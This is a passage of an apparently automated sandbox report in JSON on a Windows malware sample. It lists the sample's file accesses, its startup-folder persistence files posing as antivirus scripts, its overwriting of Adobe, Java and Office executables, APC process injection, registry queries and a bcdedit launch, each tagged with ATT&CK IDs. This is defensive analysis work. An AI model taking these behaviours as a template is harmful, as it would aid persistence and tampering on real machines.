\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe.Local\\\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Program Files\\Common Files\\VMware\\\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\VMware\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\hosts\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\lmhosts.sam\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\networks\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\protocol\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Windows\\System32\\drivers\\etc\\services\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus2.vbs\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMomIsGay.html\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMom.vbs\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS32.mp3\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS323.mp3\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-113", "type": 6, "relevance": 5, "name": "Touches files in program files directory", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\AdobeARMHelper.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\armsvc.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Adobe AIR Application Installer.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Resources\\Adobe AIR Updater.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Resources\\airappinstaller.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\Adobe AIR\\Versions\\1.0\\Resources\\template.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\Java\\Java Update\\jaureg.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\Java\\Java Update\\jucheck.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\Java\\Java Update\\jusched.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\DW\\DW20.EXE\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\ConvertInkStore.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkWatson.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\pipanel.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\FLTLDR.EXE\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\LICLUA.EXE\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\MSOICONS.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\adobe\\arm\\1.0\\adobearm.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\adobe\\arm\\1.0\\adobearmhelper.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\adobe\\arm\\1.0\\armsvc.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\adobe air application installer.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\resources\\adobe air updater.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\resources\\airappinstaller.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\adobe air\\versions\\1.0\\resources\\template.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\java\\java update\\jaureg.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\java\\java update\\jucheck.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\java\\java update\\jusched.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\oarpmany.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\odeploy.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\ospprearm.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\smart tag\\smarttaginstall.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\textconv\\wksconv\\wkconv.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-85", "type": 6, "relevance": 3, "name": "Queues an Asynchronous Procedure Call (APC) in a remote process (injection)", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"NtQueueApcThread\" (UID: 00000000-00005752)", "origin": "API Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-2", "type": 6, "relevance": 8, "name": "Creates new processes", "description": "\"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\system32\\bcdedit.exe\")\n \"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\system32\\cmd.exe\")", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": 